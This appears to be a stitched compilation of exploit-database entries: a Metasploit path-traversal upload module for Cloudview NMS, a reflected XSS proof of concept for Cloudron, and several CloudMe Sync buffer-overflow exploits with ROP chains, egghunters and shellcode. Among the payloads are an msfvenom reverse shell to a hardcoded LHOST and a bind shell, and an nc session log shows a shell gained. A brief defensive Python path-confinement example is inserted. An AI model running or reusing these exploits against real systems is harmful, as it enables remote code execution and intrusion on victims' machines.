    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "/MPR=#{@sess}:/",
      'version' => '1.1',
      'ctype'   => 'application/x-www-form-urlencoded',
      'data'    => "username=#{datastore['USERNAME']}&password=#{datastore['PASSWORD']}&mybutton=Login%21&donotusejava=html"
    })

    # This is needed to setup the upload directory
    res = send_request_cgi({
      'method'  => 'GET',
      'uri'     => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@!-!-!@extdir%5Cfilelistpage!-!1000",
      'version' => '1.1',
    })

    # Uploading VBS file
    data = Rex::MIME::Message.new
    data.add_part("#{vbs_content}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{vbs_name}\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")

    res = send_request_cgi({
      'method'  => 'POST',
      'uri'     => "/MPR=#{@sess}:/",
      'version' => '1.1',
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
      'data'    => post_data
    })

    if res.body =~ /Uploaded file OK/
      print_good("Uploaded #{vbs_name} successfully!")
      print_status("Uploading #{mof_name} to #{peer}...")

      # Setting up upload directory
      res = send_request_cgi({
        'method'  => 'GET',
        'uri'     => "/MPR=#{@sess}:/descriptor!ChangeDir=C:@..@..@..@WINDOWS@system32@wbem@mof@!-!-!@extdir%5Cfilelistpage!-!1000",
        'version' => '1.1'
      })

      # Uploading MOF file
      data = Rex::MIME::Message.new
      data.add_part("#{mof}", "application/octet-stream", nil, "form-data; name=\"upfile\"; filename=\"#{mof_name}\"")
      post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, "--_Part_")

      res = send_request_cgi({
        'method'  => 'POST',
        'uri'     => "/MPR=#{@sess}:/",
        'version' => '1.1',
        'ctype'   => "multipart/form-data; boundary=#{data.bound}",
        'data'    => post_data
      })

      if res.body =~ /Uploaded file OK/
        print_good("Uploaded #{mof_name} successfully!")
      else
        print_error("Something went wrong...")
      end
    else
      print_error("Something went wrong...")
    end
  end
end
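Both Cloudview NMS modules above land files outside the intended directory because the server joins a client-supplied name to a base path without confining it: `../` sequences in the TFTP `RemoteFile`, and `..@` sequences (with `@` acting as a separator) in the HTTP `ChangeDir` parameter. As an added example, not from the modules or from the vendor, a server-side confinement check in Python that folds the separator aliases, bounds percent-decoding and rejects any name that still escapes the root; the root directory and the test names are constructed.

```python
import posixpath
import re
from typing import Optional
from urllib.parse import unquote

# Separator aliases seen in the two modules above: '\' (Windows) and '@', which the NMS
# web handler accepted as a directory separator ("C:@..@..@..@WINDOWS@system32@").
SEPARATOR_ALIASES = re.compile(r"[@\\]")
DRIVE_PREFIX = re.compile(r"^[A-Za-z]:")


def canonicalize(requested: str) -> str:
    """Undo the encodings a server must undo before it can judge a client-supplied path."""
    decoded = requested
    for _ in range(3):  # bounded repeated percent-decoding: %252e -> %2e -> .
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    # Fold every separator alias into '/', so "..@x" and "..\x" are judged as "../x".
    return SEPARATOR_ALIASES.sub("/", decoded)


def resolve_under_root(root: str, requested: str) -> Optional[str]:
    """Return the on-disk path for `requested` confined to `root`, or None if it must be rejected."""
    path = canonicalize(requested)
    if "\x00" in path:
        return None  # NUL bytes truncate names in C-based file APIs
    if path.startswith("/") or DRIVE_PREFIX.match(path):
        return None  # absolute and drive-letter paths are never the client's to choose
    normalized = posixpath.normpath(path)
    if normalized in (".", "") or normalized.split("/")[0] == "..":
        return None  # empty name, or a path that still escapes after normalisation
    return posixpath.join(root, normalized)
```

Rejecting rather than "cleaning" traversal sequences matters here: a filter that strips `../` but not `..@` or `..\` is what the HTTP module walks around.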
# Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)
# Date: 10.06.2021
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://cloudron.io
# Software Link: https://www.cloudron.io/get.html
# Version: 6.3 >
# CVE : CVE-2021-40868
Proof of Concept:
1. Go to https://localhost/login.html?returnTo=
2. Type your payload after returnTo=
3. Fill in the login information and press the sign in button.
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow - WoW64 - (DEP Bypass)
# Date: 24.01.2019
# Exploit Author: Matteo Malvica
# Vendor Homepage: https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category: Remote
# Contact: https://twitter.com/matteomalvica
# Version: CloudMe Sync 1.11.2
# Tested on: Windows 7 SP1 x64
# CVE-2018-6892
# Ported to WoW64 from https://www.exploit-db.com/exploits/46218
# Python 2 script: the payload strings below are byte strings and print is a statement.
import socket
import struct


def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x61ba8b5e,  # POP EAX # RETN [Qt5Gui.dll]
        0x690398a8,  # ptr to &VirtualProtect() [IAT Qt5Core.dll]
        0x61bdd7f5,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
        0x68aef542,  # XCHG EAX,ESI # RETN [Qt5Core.dll]
        0x68bfe66b,  # POP EBP # RETN [Qt5Core.dll]
        0x68f82223,  # & jmp esp [Qt5Core.dll]
        0x6d9f7736,  # POP EDX # RETN [Qt5Sql.dll]
        0xfffffdff,  # Value to negate, will become 0x00000201
        0x6eb47092,  # NEG EDX # RETN [libgcc_s_dw2-1.dll]
        0x61e870e0,  # POP EBX # RETN [Qt5Gui.dll]
        0xffffffff,  #
        0x6204f463,  # INC EBX # RETN [Qt5Gui.dll]
        0x68f8063c,  # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]
        0x61ec44ae,  # POP EDX # RETN [Qt5Gui.dll]
        0xffffffc0,  # Value to negate, will become 0x00000040
        0x6eb47092,  # NEG EDX # RETN [libgcc_s_dw2-1.dll]
        0x61e2a807,  # POP ECX # RETN [Qt5Gui.dll]
        0x6eb573c9,  # &Writable location [libgcc_s_dw2-1.dll]
        0x61e85d66,  # POP EDI # RETN [Qt5Gui.dll]
        0x6d9e431c,  # RETN (ROP NOP) [Qt5Sql.dll]
        0x61ba8ce5,  # POP EAX # RETN [Qt5Gui.dll]
        0x90909090,  # nop
        0x61b6b8d0,  # PUSHAD # RETN [Qt5Gui.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
target="127.0.0.1"
junk="A"*1052
eip = "\xfc\x57\xea\x61" # 0x61ea57fc
nops = "\x90\x90\x90\x90"
egg64 = ("\x66\x8c\xcb\x80\xfb\x23\x75\x08\x31\xdb\x53\x53\x53\x53\xb3\xc0"
"\x66\x81\xca\xff\x0f\x42\x52\x80\xfb\xc0\x74\x19\x6a\x02\x58\xcd"
"\x2e\x5a\x3c\x05\x74\xea\xb8"
"\x77\x30\x30\x74" # tag w00t
"\x89\xd7\xaf\x75\xe5\xaf\x75\xe2\xff\xe7\x6a\x26\x58\x31\xc9\x89"
"\xe2\x64\xff\x13\x5e\x5a\xeb\xdf")
#Shellcode calc.exe
shellcode = ""
shellcode += "\xdb\xde\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x31\xba\xef"
shellcode += "\xc3\xbd\x59\x83\xc0\x04\x31\x50\x14\x03\x50\xfb\x21"
shellcode += "\x48\xa5\xeb\x24\xb3\x56\xeb\x48\x3d\xb3\xda\x48\x59"
shellcode += "\xb7\x4c\x79\x29\x95\x60\xf2\x7f\x0e\xf3\x76\xa8\x21"
shellcode += "\xb4\x3d\x8e\x0c\x45\x6d\xf2\x0f\xc5\x6c\x27\xf0\xf4"
shellcode += "\xbe\x3a\xf1\x31\xa2\xb7\xa3\xea\xa8\x6a\x54\x9f\xe5"
shellcode += "\xb6\xdf\xd3\xe8\xbe\x3c\xa3\x0b\xee\x92\xb8\x55\x30"
shellcode += "\x14\x6d\xee\x79\x0e\x72\xcb\x30\xa5\x40\xa7\xc2\x6f"
shellcode += "\x99\x48\x68\x4e\x16\xbb\x70\x96\x90\x24\x07\xee\xe3"
shellcode += "\xd9\x10\x35\x9e\x05\x94\xae\x38\xcd\x0e\x0b\xb9\x02"
shellcode += "\xc8\xd8\xb5\xef\x9e\x87\xd9\xee\x73\xbc\xe5\x7b\x72"
shellcode += "\x13\x6c\x3f\x51\xb7\x35\x9b\xf8\xee\x93\x4a\x04\xf0"
shellcode += "\x7c\x32\xa0\x7a\x90\x27\xd9\x20\xfe\xb6\x6f\x5f\x4c"
shellcode += "\xb8\x6f\x60\xe0\xd1\x5e\xeb\x6f\xa5\x5e\x3e\xd4\x59"
shellcode += "\x15\x63\x7c\xf2\xf0\xf1\x3d\x9f\x02\x2c\x01\xa6\x80"
shellcode += "\xc5\xf9\x5d\x98\xaf\xfc\x1a\x1e\x43\x8c\x33\xcb\x63"
shellcode += "\x23\x33\xde\x07\xa2\xa7\x82\xe9\x41\x40\x20\xf6"
payload = junk+ eip + nops * 3 + rop_chain + nops*4 + egg64 + nops*4 + "w00tw00t" + shellcode
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(payload)
except:
    print "Crashed!"
#######################################################
# Exploit Title: CloudMe Sync v1.11.2 Buffer Overflow + Egghunt
# Date: 23.04.2018
# Exploit Author: T3jv1l
# Vendor Homepage: https://www.cloudme.com/en
# Software: https://www.cloudme.com/downloads/CloudMe_1112.exe
# Category: Local
# Contact: https://twitter.com/T3jv1l
# Version: CloudMe Sync 1.11.2 - Buffer Overflow + Egghunt
# Tested on: Windows 7 SP1 x86
# CVE-2018-6892
# Real exploit https://www.exploit-db.com/exploits/44027 in version 1.11.0
# Hello subinacls and NytroRST !
#############################################################
import socket
egg = (
"\x66\x81\xca\xff\x0f\x42\x52\x6a"
"\x02\x58\xcd\x2e\x3c\x05\x5a\x74" #boom
"\xef\xb8\x62\x6f\x6f\x6d\x8b\xfa"
"\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
target="127.0.0.1"
junk="A"*1015
jmp="\xd9\x37\x99\x69" #0x699937d9 push ret
jump_back="\xeb\xc4" #jump -60 bytes
#Shellcode calc.exe
buf = ""
buf +="\xba\xd5\x31\x08\x38\xdb\xcb\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
buf +="\x33\x83\xc3\x04\x31\x53\x0e\x03\x86\x3f\xea\xcd\xd4\xa8\x63"
buf +="\x2d\x24\x29\x14\xa7\xc1\x18\x06\xd3\x82\x09\x96\x97\xc6\xa1"
buf +="\x5d\xf5\xf2\x32\x13\xd2\xf5\xf3\x9e\x04\x38\x03\x2f\x89\x96"
buf +="\xc7\x31\x75\xe4\x1b\x92\x44\x27\x6e\xd3\x81\x55\x81\x81\x5a"
buf +="\x12\x30\x36\xee\x66\x89\x37\x20\xed\xb1\x4f\x45\x31\x45\xfa"
buf +="\x44\x61\xf6\x71\x0e\x99\x7c\xdd\xaf\x98\x51\x3d\x93\xd3\xde"
buf +="\xf6\x67\xe2\x36\xc7\x88\xd5\x76\x84\xb6\xda\x7a\xd4\xff\xdc"
buf +="\x64\xa3\x0b\x1f\x18\xb4\xcf\x62\xc6\x31\xd2\xc4\x8d\xe2\x36"
buf +="\xf5\x42\x74\xbc\xf9\x2f\xf2\x9a\x1d\xb1\xd7\x90\x19\x3a\xd6"
buf +="\x76\xa8\x78\xfd\x52\xf1\xdb\x9c\xc3\x5f\x8d\xa1\x14\x07\x72"
buf +="\x04\x5e\xa5\x67\x3e\x3d\xa3\x76\xb2\x3b\x8a\x79\xcc\x43\xbc"
buf +="\x11\xfd\xc8\x53\x65\x02\x1b\x10\x99\x48\x06\x30\x32\x15\xd2"
buf +="\x01\x5f\xa6\x08\x45\x66\x25\xb9\x35\x9d\x35\xc8\x30\xd9\xf1"
buf +="\x20\x48\x72\x94\x46\xff\x73\xbd\x24\x9e\xe7\x5d\x85\x05\x80"
buf +="\xc4\xd9"
payload1=junk+egg+"B"*5 + jmp + jump_back
payload2="boomboom" + buf
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, 8888))
    s.send(payload1 + payload2)
except:
    print "Don't Crash Me !"
#######################################################
# Exploit Title: Local Buffer Overflow on CloudMe Sync v1.11.0
# Date: 08.03.2018
# Vendor Homepage: https://www.cloudme.com/en
# Software Link: https://www.cloudme.com/downloads/CloudMe_1110.exe
# Category: Local
# Exploit Discovery: Prasenjit Kanti Paul
# Web: http://hack2rule.wordpress.com/
# Version: 1.11.0
# Tested on: Windows 7 SP1 x86
# CVE: CVE-2018-7886
# Solution: Update CloudMe Sync to 1.11.2
#######################################################
#Disclosure Date: March 12, 2018
#Response Date: March 14, 2018
#Bug Fixed: April 12, 2018
# Run this file in victim's win 7 sp1 x86 system where CloudMe Sync 1.11.0 has been installed.
import socket
target="127.0.0.1"
junk="A"*1052
eip="\x7B\x8A\xA9\x68" #68a98a7b : JMP ESP - Qt5Core.dll
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.1 LPORT=4444 -f c
shellcode=("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68"
"\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\xc0\xa8\x02\x01\x68"
"\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2"
"\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6"
"\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44"
"\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56"
"\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff"
"\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6"
"\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5")
payload=junk+eip+shellcode
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target,8888))
s.send(payload)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'CloudMe Sync v1.10.9',
      'Description'    => %q{
        This module exploits a stack-based buffer overflow vulnerability
        in CloudMe Sync v1.10.9 client application. This module has been
        tested successfully on Windows 7 SP1 x86.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'hyp3rlinx',       # Original exploit author
          'Daniel Teixeira'  # MSF module author
        ],
      'References'     =>
        [
          [ 'CVE', '2018-6892'],
          [ 'EDB', '44027' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
      'Platform'       => 'win',
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Targets'        =>
        [
          [ 'CloudMe Sync v1.10.9',
            {
              'Offset' => 2232,
              'Ret'    => 0x61e7b7f6
            }
          ]
        ],
      'Privileged'     => true,
      'DisclosureDate' => 'Jan 17 2018',
      'DefaultTarget'  => 0))

    register_options([Opt::RPORT(8888)])
  end

  def exploit
    connect
    buffer = make_nops(target['Offset'])
    buffer << generate_seh_record(target.ret)
    buffer << payload.encoded
    sock.put(buffer)
    handler
  end
end
# Exploit Title: CloudMe Sync 1.10.9 - Buffer Overflow (SEH)(DEP Bypass)
# Date: 2018-08-05
# Exploit Author: Manoj Ahuje
# Linkedin: https://www.linkedin.com/in/manojahuje/
# Vendor Homepage: https://www.cloudme.com/
# Software Link: https://www.cloudme.com/downloads/CloudMe_1109.exe
# Tested on: Windows 10 Home (x64)
#!/usr/bin/env python
import socket,struct
print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass on Win10 x64'
def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x61ba8b5e, # POP EAX # RETN [Qt5Gui.dll]
        0x690398a0, # ptr to &VirtualAlloc() [IAT Qt5Core.dll]
        0x61cd7f74, # MOV EAX,DWORD PTR DS:[EAX] # RETN [Qt5Gui.dll]
        0x68d50536, # XCHG EAX,ESI # RETN [Qt5Core.dll]
        0x699f619a, # POP EBP # RETN [Qt5Network.dll]
        0x68f7a81b, # & jmp esp [Qt5Core.dll]
        0x68f9a472, # POP EDX # RETN [Qt5Core.dll]
        0xffffffff, # Value to negate, will become 0x00000001
        0x6eb47052, # NEG EDX # RETN [libgcc_s_dw2-1.dll]
        0x68c7af10, # POP EBX # RETN [Qt5Core.dll]
        0xffffffff, #
        0x6201df92, # INC EBX # RETN [Qt5Gui.dll]
        0x68f8063c, # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]
        0x61f03b9c, # POP EAX # RETN [Qt5Gui.dll]
        0x7cfc896b, # put delta into eax (-> put 0x00001000 into edx)
        0x69a76004, # ADD EAX,83038642 # ADD AL,53 # RETN [Qt5Network.dll]
        0x62035b71, # XCHG EAX,EDX # RETN [Qt5Gui.dll]
        0x61db4eca, # POP EAX # RETN [Qt5Gui.dll]
        0xffffffc0, # Value to negate, will become 0x00000040
        0x6fe4ceaa, # NEG EAX # RETN [libstdc++-6.dll]
        0x68fb862d, # XCHG EAX,ECX # RETN [Qt5Core.dll]
        0x68b13f2a, # POP EDI # RETN [Qt5Core.dll]
        0x6fe4ceac, # RETN (ROP NOP) [libstdc++-6.dll]
        0x61ba8fa8, # POP EAX # RETN [Qt5Gui.dll]
        0x90909090, # nop
        0x61bf7fca, # PUSHAD # RETN [Qt5Gui.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#msf payload calc alpha numeric
shellcode = ""
shellcode += "\x89\xe3\xd9\xe5\xd9\x73\xf4\x5a\x4a\x4a\x4a\x4a"
shellcode += "\x4a\x4a\x4a\x4a\x4a\x4a\x4a\x43\x43\x43\x43\x43"
shellcode += "\x43\x37\x52\x59\x6a\x41\x58\x50\x30\x41\x30\x41"
shellcode += "\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42"
shellcode += "\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x49"
shellcode += "\x6c\x6b\x58\x4e\x62\x63\x30\x57\x70\x77\x70\x53"
shellcode += "\x50\x6e\x69\x6b\x55\x64\x71\x39\x50\x50\x64\x6e"
shellcode += "\x6b\x42\x70\x64\x70\x6c\x4b\x43\x62\x36\x6c\x6e"
shellcode += "\x6b\x43\x62\x75\x44\x6e\x6b\x52\x52\x64\x68\x46"
shellcode += "\x6f\x38\x37\x50\x4a\x76\x46\x64\x71\x4b\x4f\x4e"
shellcode += "\x4c\x77\x4c\x35\x31\x61\x6c\x77\x72\x76\x4c\x37"
shellcode += "\x50\x4a\x61\x5a\x6f\x74\x4d\x37\x71\x39\x57\x38"
shellcode += "\x62\x5a\x52\x30\x52\x66\x37\x6e\x6b\x50\x52\x62"
shellcode += "\x30\x6c\x4b\x62\x6a\x57\x4c\x6c\x4b\x52\x6c\x47"
shellcode += "\x61\x74\x38\x6d\x33\x71\x58\x43\x31\x38\x51\x50"
shellcode += "\x51\x6c\x4b\x33\x69\x67\x50\x35\x51\x48\x53\x6e"
shellcode += "\x6b\x57\x39\x75\x48\x69\x73\x54\x7a\x63\x79\x4e"
shellcode += "\x6b\x35\x64\x6c\x4b\x35\x51\x6a\x76\x46\x51\x39"
shellcode += "\x6f\x6e\x4c\x6f\x31\x48\x4f\x44\x4d\x36\x61\x48"
shellcode += "\x47\x34\x78\x6b\x50\x74\x35\x69\x66\x73\x33\x73"
shellcode += "\x4d\x49\x68\x55\x6b\x43\x4d\x47\x54\x74\x35\x68"
shellcode += "\x64\x63\x68\x4e\x6b\x46\x38\x66\x44\x33\x31\x59"
shellcode += "\x43\x61\x76\x6c\x4b\x66\x6c\x50\x4b\x4c\x4b\x50"
shellcode += "\x58\x47\x6c\x65\x51\x69\x43\x6c\x4b\x63\x34\x6e"
shellcode += "\x6b\x43\x31\x68\x50\x4e\x69\x61\x54\x65\x74\x65"
shellcode += "\x74\x51\x4b\x51\x4b\x73\x51\x73\x69\x62\x7a\x42"
shellcode += "\x71\x69\x6f\x39\x70\x51\x4f\x73\x6f\x43\x6a\x4e"
shellcode += "\x6b\x52\x32\x78\x6b\x4e\x6d\x31\x4d\x53\x5a\x67"
shellcode += "\x71\x6c\x4d\x4f\x75\x48\x32\x57\x70\x77\x70\x43"
shellcode += "\x30\x66\x30\x61\x78\x46\x51\x6e\x6b\x70\x6f\x6e"
shellcode += "\x67\x59\x6f\x6b\x65\x4f\x4b\x78\x70\x6d\x65\x39"
shellcode += "\x32\x50\x56\x73\x58\x6c\x66\x6c\x55\x4d\x6d\x6d"
shellcode += "\x4d\x49\x6f\x49\x45\x65\x6c\x45\x56\x73\x4c\x45"
shellcode += "\x5a\x6b\x30\x6b\x4b\x39\x70\x53\x45\x34\x45\x4d"
shellcode += "\x6b\x42\x67\x65\x43\x63\x42\x70\x6f\x50\x6a\x37"
shellcode += "\x70\x66\x33\x6b\x4f\x69\x45\x30\x63\x35\x31\x72"
shellcode += "\x4c\x65\x33\x76\x4e\x75\x35\x42\x58\x45\x35\x67"
shellcode += "\x70\x41\x41"
host='127.0.0.1'
#payload = "A" * (2236+116)
junk1 = "A"*(156+48)
rop=rop_chain
nop = "\x90"*10
junk2="D"*(2236+116-len(junk1)-len(rop)-len(nop)-len(shellcode))
nseh = "GGGG"
seh = struct.pack('<L',0x699CCB7F)#network Address=699CCB7F Disassembly=ADD ESP,83C
trigger = "B"*50000
payload = junk1+rop+nop+shellcode+junk2 +nseh + seh + trigger
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,8888))
s.send(payload)
print 'Check calculator should be running'
# Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)
# Date: 2018-05-27
# Author: Juan Prescotto
# Tested Against: Win7 Pro SP1 64 bit
# Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe
# Tested Against Version: 1.10.9
# Special Thanks to my wife for allowing me spend countless hours on this passion of mine
# Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/)
# for his work on the original exploit
# Bad Characters: \x00
# SEH Offset: 2236
# Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll,libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll
# Victim Machine:
# C:\>netstat -nao | find "8888"
# TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 2640
# C:\>tasklist | find "2640"
# CloudMe.exe 2640 Console 1 36,632 K
# Attacking Machine:
# root@kali:~/Desktop# python cloudme.py
# CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass
# [+] CloudMe Target IP> 192.168.12.4
# Sending buffer overflow to CloudMe Service
# Target Should be Running a Bind Shell on Port 4444!
# root@kali:~/Desktop# nc -nv 192.168.12.4 4444
# (UNKNOWN) [192.168.12.4] 4444 (?) open
# Microsoft Windows [Version 6.1.7601]
# Copyright (c) 2009 Microsoft Corporation. All rights reserved.
# C:\Users\jprescotto\AppData\Local\Programs\CloudMe\CloudMe>
# My register setup when VirtualProtect() is called (Defeat DEP) :
# EAX = NOP (0x90909090)
# ECX = lpOldProtect (ptr to W address)
# EDX = NewProtect (0x40)
# EBX = dwSize
# ESP = lPAddress (automatic)
# EBP = ReturnTo (ptr to jmp esp)
# ESI = ptr to VirtualProtect()
# EDI = ROP NOP (RETN)
#!/usr/bin/python
import socket,struct
print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass'
def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x61d1e7fe, # POP ECX # RETN [Qt5Gui.dll]
        0x690398a8, # ptr to &VirtualProtect() [IAT Qt5Core.dll]
        0x6fe70610, # MOV EAX,DWORD PTR DS:[ECX] # RETN [libstdc++-6.dll]
        0x61c40a6f, # XCHG EAX,ESI # RETN [Qt5Gui.dll]
        0x68c8ea5a, # POP EBP # RETN [Qt5Core.dll]
        0x68d652e1, # & call esp [Qt5Core.dll]
        0x68fa7ca2, # POP EDX # RETN [Qt5Core.dll]
        0xfffffdff, # Value to negate, will become 0x00000201
        0x6eb47092, # NEG EDX # RETN [libgcc_s_dw2-1.dll]
        0x68d52747, # POP EBX # RETN [Qt5Core.dll]
        0xffffffff, #
        0x68f948bc, # INC EBX # RETN [Qt5Core.dll]
        0x68f8063c, # ADD EBX,EDX # ADD AL,0A # RETN [Qt5Core.dll]
        0x68f9a472, # POP EDX # RETN [Qt5Core.dll]
        0xffffffc0, # Value to negate, will become 0x00000040
        0x6eb47092, # NEG EDX # RETN [libgcc_s_dw2-1.dll]
        0x61f057ab, # POP ECX # RETN [Qt5Gui.dll]
        0x6eb5efa3, # &Writable location [libgcc_s_dw2-1.dll]
        0x61dc14d1, # POP EDI # RETN [Qt5Gui.dll]
        0x64b4ed0c, # RETN (ROP NOP) [libwinpthread-1.dll]
        0x61ba6245, # POP EAX # RETN [Qt5Gui.dll]
        0x90909090, # nop
        0x61b45ea3, # PUSHAD # RETN [Qt5Gui.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
rop_chain = create_rop_chain()
#msf payload(shell_bind_tcp) > show options
#Module options (payload/windows/shell_bind_tcp):
# Name Current Setting Required Description
# EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
# LPORT 4444 yes The listen port
# RHOST no The target address
#msf payload(shell_bind_tcp) > generate -b '\x00' -t py
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
shellcode = ""
shellcode += "\xda\xcf\xba\x8c\x90\x7b\x70\xd9\x74\x24\xf4\x5e\x33"
shellcode += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\xda\x83\x99"
shellcode += "\x85\x1e\x4b\xdf\x66\xde\x8c\x80\xef\x3b\xbd\x80\x94"
shellcode += "\x48\xee\x30\xde\x1c\x03\xba\xb2\xb4\x90\xce\x1a\xbb"
shellcode += "\x11\x64\x7d\xf2\xa2\xd5\xbd\x95\x20\x24\x92\x75\x18"
shellcode += "\xe7\xe7\x74\x5d\x1a\x05\x24\x36\x50\xb8\xd8\x33\x2c"
shellcode += "\x01\x53\x0f\xa0\x01\x80\xd8\xc3\x20\x17\x52\x9a\xe2"
shellcode += "\x96\xb7\x96\xaa\x80\xd4\x93\x65\x3b\x2e\x6f\x74\xed"
shellcode += "\x7e\x90\xdb\xd0\x4e\x63\x25\x15\x68\x9c\x50\x6f\x8a"
shellcode += "\x21\x63\xb4\xf0\xfd\xe6\x2e\x52\x75\x50\x8a\x62\x5a"
shellcode += "\x07\x59\x68\x17\x43\x05\x6d\xa6\x80\x3e\x89\x23\x27"
shellcode += "\x90\x1b\x77\x0c\x34\x47\x23\x2d\x6d\x2d\x82\x52\x6d"
shellcode += "\x8e\x7b\xf7\xe6\x23\x6f\x8a\xa5\x2b\x5c\xa7\x55\xac"
shellcode += "\xca\xb0\x26\x9e\x55\x6b\xa0\x92\x1e\xb5\x37\xd4\x34"
shellcode += "\x01\xa7\x2b\xb7\x72\xee\xef\xe3\x22\x98\xc6\x8b\xa8"
shellcode += "\x58\xe6\x59\x44\x50\x41\x32\x7b\x9d\x31\xe2\x3b\x0d"
shellcode += "\xda\xe8\xb3\x72\xfa\x12\x1e\x1b\x93\xee\xa1\x32\x38"
shellcode += "\x66\x47\x5e\xd0\x2e\xdf\xf6\x12\x15\xe8\x61\x6c\x7f"
shellcode += "\x40\x05\x25\x69\x57\x2a\xb6\xbf\xff\xbc\x3d\xac\x3b"
shellcode += "\xdd\x41\xf9\x6b\x8a\xd6\x77\xfa\xf9\x47\x87\xd7\x69"
shellcode += "\xeb\x1a\xbc\x69\x62\x07\x6b\x3e\x23\xf9\x62\xaa\xd9"
shellcode += "\xa0\xdc\xc8\x23\x34\x26\x48\xf8\x85\xa9\x51\x8d\xb2"
shellcode += "\x8d\x41\x4b\x3a\x8a\x35\x03\x6d\x44\xe3\xe5\xc7\x26"
shellcode += "\x5d\xbc\xb4\xe0\x09\x39\xf7\x32\x4f\x46\xd2\xc4\xaf"
shellcode += "\xf7\x8b\x90\xd0\x38\x5c\x15\xa9\x24\xfc\xda\x60\xed"
